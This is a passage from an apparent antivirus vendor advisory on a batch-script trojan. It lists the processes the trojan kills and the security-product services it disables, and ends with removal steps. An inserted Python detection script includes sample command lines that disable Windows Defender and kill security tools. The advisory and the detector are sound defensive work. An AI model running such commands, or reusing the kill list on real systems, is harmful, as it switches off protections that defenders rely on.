- sidebar.exe
- siteadv.exe
- smc.exe
- smcgui.exe
- smex_activeupda
- smex_master.exe
- smex_remoteconf
- smex_systemwatc
- smoutlookpack.exe
- sms.exe
- smsectrl.exe
- smselog.exe
- smsesjm.exe
- smsesp.exe
- smsesrv.exe
- smsetask.exe
- smseui.exe
- smsx.exe
- snac.exe
- sndmon.exe
- sndsrvc.exe
- snhwsrv.exe
- spbbcsvc.exe
- spideragent.exe
- spiderml.exe
- spidernt.exe
- spiderui.exe
- spntsvc.exe
- srvload.exe
- srvmon.exe
- sschk.exe
- ssm.exe
- ssp.exe
- ssscheduler.exe
- starta.exe
- stinger.exe
- stopa.exe
- stopp.exe
- stwatchdog.exe
- svcgenerichost
- svcharge.exe
- svcntaux.exe
- svdealer.exe
- svframe.exe
- svtray.exe
- swc_service.exe
- swdsvc.exe
- sweepsrv.sys
- swi_service.exe
- swnetsup.exe
- symlcsvc.exe
- symproxysvc.exe
- symsport.exe
- symtray.exe
- symwsc.exe
- sysdoc32.exe
- sysoptenginesvc.exe
- tbmon.exe
- tclproc.exe
- tfgui.exe
- tfservice.exe
- tftray.exe
- tfun.exe
- tmas.exe
- tmlisten.exe
- tmntsrv.exe
- tmpfw.exe
- tmproxy.exe
- tnbutil.exe
- toolbarupdater.exe
- tpsrv.exe
- trjscan.exe
- trupd.exe
- tsansrf.exe
- tsatisy.exe
- tscutynt.exe
- tsmpnt.exe
- ucservice.exe
- udaterui.exe
- uiseagnt.exe
- uiwatchdog.exe
- umxagent.exe
- umxcfg.exe
- umxfwhlp.exe
- umxpol.exe
- unsecapp.exe
- unvet32.exe
- up2date.exe
- update_task.exe
- updaterui.exe
- updtnv28.exe
- upfile.exe
- upschd.exe
- urllstck.exe
- usrprmpt.exe
- v2iconsole.exe
- v3clnsrv.exe
- v3exec.exe
- v3imscn.exe
- v3lite.exe
- v3main.exe
- v3medic.exe
- v3sp.exe
- v3svc.exe
- vetmsg.exe
- vettray.exe
- vpc32.exe
- vpdn_lu.exe
- vprosvc.exe
- vprot.exe
- vptray.exe
- vrv.exe
- vrvmail.exe
- vrvmon.exe
- vrvnet.exe
- vshwin32.exe
- vsmain.exe
- vsmon.exe
- vsserv.exe
- vsstat.exe
- vstskmgr.exe
- webproxy.exe
- webscanx.exe
- websensecontrolservice.exe
- webtrapnt.exe
- wfxctl32.exe
- wfxmod32.exe
- wfxsnt40.exe
- winroute.exe
- wrctrl.exe
- wrsa.exe
- wrspysetup.exe
- wscntfy.exe
- wssfcmai.exe
- wtusystemsuport.exe
- xcommsvr.exe
- xfilter.exe
- zanda.exe
- zavcore.exe
- zillya.exe
- zlclient.exe
- zlh.exe
- Terminate the following running processes using taskkill /im {Process Name} /f:
- aclient.exe
- aclntusr.exe
- aesecurityservice.exe
- aexagentuihost.exe
- aexnsagent.exe
- aexnsrcvsvc.exe
- aexsvc.exe
- aexswdusr.exe
- agntsvc.exe
- amsvc.exe
- atrshost.exe
- avscc.exe
- basfipm.exe
- bcreporter.exe
- bcrservice.exe
- bluestripecollector.exe
- ccflic0.exe
- ccflic4.exe
- ccm messaging.exe
- cdm.exe
- certificateprovider.exe
- chrome.exe
- client.exe
- client64.exe
- collwrap.exe
- config_api_service.exe
- control_panel.exe
- csdbsync.exe
- cslog.exe
- csmon.exe
- csradius.exe
- csrss_tc.exe
- cstacacs.exe
- ctdataload.exe
- cwbunnav.exe
- dbeng50.exe
- dbsnmp.exe
- dltray.exe
- dolphincharge.e
- dolphincharge.exe
- dsmcad.exe
- dsmcsvc.exe
- dwrcst.exe
- encsvc.exe
- epmd.exe
- erlsrv.exe
- excel.exe
- execstat.exe
- firefox.exe
- firefoxconfig.exe
- fnplicensingservice.exe
- frzstate2k.exe
- googlecrashhandler.exe
- googlecrashhandler64.ex
- googleupdate.exe
- hasplmv.exe
- hdb.exe
- healthservice.exe
- hpqwmiex.exe
- ilicensesvc.exe
- inet_gethost.exe
- infopath.exe
- isqlplussvc.exe
- kb891711.exe
- keysvc.exe
- loggetor.exe
- managementagenthost.exe
- managementagentnt.exe /
- monitoringhost.exe
- msaccess.exe
- msdtssrvr.exe
- msftesql.exe
- msmdsrv.exe
- mspmspsv.exe
- mspub.exe
- musnotificationux.exe
- mydesktopqos.exe
- mydesktopservice.exe
- mysqld.exe
- mysqld-nt.exe
- mysqld-opt.exe - sql
- nd2svc.exe
- ndrvs.exe
- ndrvx.exe
- nerosvc.exe
- netalertclient.exe
- netsession_win.exe
- nexe
- nimbus.exe
- nimcluster.exe
- nlclient.exe
- nlsvc.exe
- nmagent.exe
- npmdagent.exe
- nslocollectorservice.exe
- ntcaagent.exe
- ntcadaemon.exe
- ntcaservice.exe
- ntevl.exe
- ntservices.exe
- ocautoupds.exe
- ocomm.exe
- ocssd.exe
- omniagent.exe
- omslogmanager.exe
- omtsreco.exe
- onenote.exe
- oracle.exe
- outlook.exe
- paamsrv.exe
- patch.exe
- patrolagent.exe
- patrolperf.exe
- paxton.net2.clientservice.exe
- paxton.net2.commsserverservice.exe
- pcscm.exe
- pcsws.exe
- pmgreader.exe
- pmon.exe
- powerpnt.exe
- ppmcativedetection.exe
- pralarmmgr.exe
- prcalculationmgr.exe
- prconfigmgr.exe
- prdatabasemgr.exe
- premailengine.exe
- preventmgr.exe
- prftpengine.exe
- prgateway.exe
- printdevice.exe
- prlicensemgr.exe
- procexp.exe
- proficy administrator.exe
- proficyclient.exe4
- proficypublisherservice.exe
- proficyserver.exe
- proficysts.exe
- prprintserver.exe
- prproficymgr.exe
- prrds.exe
- prreader.exe
- prrouter.exe
- prschedulemgr.exe
- prstubber.exe
- prsummarymgr.exe
- prunsrv.exe
- prwriter.exe
- pthosttr.exe
- pview.exe
- pviewer.exe
- pwdfilthelp.exe
- rapuisvc.exe
- rdrcef.exe
- realmon.exe
- repmgr64.exe
- reportingservicesservicesservice.exe
- rscd.exe
- rscdsvc.exe
- rssensor.exe
- sbamsvc.exe
- scfagent_64.exe
- seanalyzertool.exe
- securitymanager.exe
- seestat.exe
- server_eventlog.exe
- server_runtime.exe
- slee81.exe
- snicheckadm.exe
- snichecksrv.exe
- snicon.exe
- snsrv.exe
- spooler.exe
- spyemergency.exe
- spyemergencysrv.exe
- sqbcoreservice.exe
- sqlagent.exe
- sqlbrowser.exe
- sqlservr.exe
- sqlwriter.exe
- ssecuritymanager.exe
- steam.exe
- swnxt.exe
- swserver.exe
- synctime.exe
- taskhostw.exe
- tbirdconfig.exe
- tdimon.exe
- teamviewer_service.exe
- thebat.exe
- thebat64.exe
- thunderbird.exe
- tiaspn~1.exe
- tnslsnr.exe
- traflnsp.exe
- traptrackermgr.exe
- uplive.exe
- uploadrecord.exe
- url_response.exe
- useractivity.exe
- useranalysis.exe
- usergate.exe
- vgauthservice.exe
- visio.exe
- vmacthlp.exe
- vmtoolsd.exe
- vmware-converter.exe
- vmware-converter-a.exe
- vmwaretray.exe
- vpatch.exe
- win32sysinfo.exe
- winlog.exe
- winvnc4.exe
- winword.exe
- wordpad.exe
- workflowresttest.exe
- xfssvccon.exe
- zapro.exe
- zonealarm.exe
- zoolz.exe - storage
- %Temp%\sync.exe
Process Termination
This malware terminates the following services if found on the affected system and disables services related to security products:
- AcronisAgent
- aswBcc
- BackupExecRPCService
- ccEvtMgr
- ccSetMgr
- EhttpSrv
- ekrn
- EPIntegrationService
- EPProtectedService
- EPSecurityService
- EPUpdateService
- ESHASRV
- FA_Scheduler
- IDriverT
- klnagent
- macmnsvc
- masvc
- MBAMService
- McShield
- mfefire
- mfemms
- mfevtp
- mfewc
- myAgtSvc
- ntrtscan
- RumorServer
- SepMasterService
- SepMasterServiceMig
- Smcinst
- SNAC
- SntpService
- svcGenericHost
- swi_filter
- swi_service
- swi_update
- swi_update_64
- Symantec
- Symantec System Recovery
- TmCCSF
- tmlisten
- TmPfw
- WdNisSvc
- WinDefend
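The service-disabling and process-killing commands listed under Installation and Process Termination leave a distinctive trail in process-creation telemetry. The following Python script is an added example, not part of this advisory or of Trend Micro's tooling: it parses constructed command lines (the log format, host names, and the subset of service and process names it checks are assumptions taken from the lists above) and flags hosts that issue several such commands against security-product services.

```python
"""Flag sc/net/taskkill tampering commands of the kind listed in this advisory."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Subset of the security-product service and image names from the page's lists
# (assumption: extend these from the full lists before real use).
SECURITY_SERVICES = {s.lower() for s in (
    "aswBcc", "bedbg", "ccEvtMgr", "ccSetMgr", "EhttpSrv", "ekrn", "ESHASRV",
    "klnagent", "macmnsvc", "masvc", "MBAMService", "McShield", "mfefire",
    "mfevtp", "mfewc", "ntrtscan", "SAVService", "SentinelAgent",
    "SepMasterService", "Smcinst", "SNAC", "swi_filter", "swi_service",
    "Symantec", "Symantec System Recovery", "TmCCSF", "tmlisten", "TmPfw",
    "WdNisSvc", "WinDefend",
)}
SECURITY_PROCESSES = {p.lower() for p in (
    "mcshield.exe", "msmpeng.exe", "ekrn.exe", "egui.exe", "ntrtscan.exe",
    "tmlisten.exe", "ccsvchst.exe", "smc.exe", "savservice.exe",
    "mbamservice.exe", "csfalconservice.exe", "cylancesvc.exe",
)}

TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping double-quoted service names whole."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmdline)]


@dataclass
class Finding:
    line_no: int
    host: str
    technique: str        # "sc_disable", "net_stop" or "taskkill"
    target: str
    security_related: bool


def parse_command(tokens: List[str]) -> Optional[Tuple[str, str]]:
    """Return (technique, target) for the three tampering patterns, else None."""
    if len(tokens) >= 2 and tokens[0].lower() in ("cmd", "cmd.exe") \
            and tokens[1].lower() == "/c":
        tokens = tokens[2:]            # commands launched from a .bat appear this way
    if not tokens:
        return None
    head = tokens[0].lower()
    if head in ("sc", "sc.exe") and len(tokens) >= 3 and tokens[1].lower() == "config":
        name, rest = tokens[2], " ".join(tokens[3:])
        if name.lower().endswith("start="):   # fused form seen in the sample: "BITSstart= disabled"
            name, rest = name[:-6], "start= " + rest
        m = re.search(r"start=\s*(\S+)", rest, re.IGNORECASE)
        # "disable" (the sample's variant) is not a documented sc start type,
        # so it would be rejected on the host, but the attempt is still worth flagging.
        if m and m.group(1).lower().startswith("disable"):
            return ("sc_disable", name)
        return None
    if head in ("net", "net.exe", "net1", "net1.exe") and len(tokens) >= 3 \
            and tokens[1].lower() == "stop":
        return ("net_stop", tokens[2])
    if head in ("taskkill", "taskkill.exe"):
        low = [t.lower() for t in tokens]
        if "/im" in low and low.index("/im") + 1 < len(tokens):
            return ("taskkill", tokens[low.index("/im") + 1])
    return None


def scan_log(text: str) -> List[Finding]:
    """Parse 'timestamp host cmdline' lines (constructed format) into findings."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), 1):
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        _, host, cmdline = parts
        parsed = parse_command(tokenize(cmdline))
        if parsed is None:
            continue
        technique, target = parsed
        pool = SECURITY_PROCESSES if technique == "taskkill" else SECURITY_SERVICES
        findings.append(Finding(line_no, host, technique, target, target.lower() in pool))
    return findings


def hosts_to_triage(findings: List[Finding], min_hits: int = 3) -> Set[str]:
    """Hosts with at least min_hits commands aimed at security-product components."""
    counts = Counter(f.host for f in findings if f.security_related)
    return {host for host, n in counts.items() if n >= min_hits}


# Constructed sample telemetry; WS01 mimics the advisory's batch script.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z WS01 cmd.exe /c sc config WinDefend start= disabled
2024-01-01T10:00:01Z WS01 sc config "Symantec System Recovery" start= disabled
2024-01-01T10:00:02Z WS01 sc config TmPfw start= disable
2024-01-01T10:00:02Z WS01 sc config BITSstart= disabled
2024-01-01T10:00:03Z WS01 net stop SAVService /y
2024-01-01T10:00:03Z WS01 net stop MSSQL$PROD /y
2024-01-01T10:00:04Z WS01 taskkill /im mcshield.exe /f
2024-01-01T10:00:04Z WS01 taskkill /f /im outlook.exe
2024-01-01T10:00:05Z WS01 sc query WinDefend
2024-01-01T10:01:00Z WS02 sc config Spooler start= auto
2024-01-01T10:01:05Z WS02 notepad.exe readme.txt
"""

if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f"line {f.line_no:2d} {f.host} {f.technique:10s} {f.target!r} "
              f"security={f.security_related}")
    print("hosts to triage:", hosts_to_triage(results))
```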
Solution
Step 1
Windows 7, Windows 8, Windows 8.1 and Windows 10 users must disable System Restore before running a scan, so that the malware or adware can be completely removed from the computer.
Step 2
Running this malware or adware does not necessarily mean that every file, folder, registry key or value listed in these steps is installed on the computer. Installation may be incomplete, or it may not occur because of operating system (OS) conditions. If the files, folders or registry entries listed in a step are not found on the computer, that step is not needed; proceed to the next step.
Step 3
Scan your computer with an anti-virus product running the latest engine and pattern files, and delete all files detected as "Trojan.BAT.STARTER.TIAOOAAZ". If the detected files have already been cleaned, quarantined or deleted by our anti-virus product, the malware has been handled and no further removal steps are required.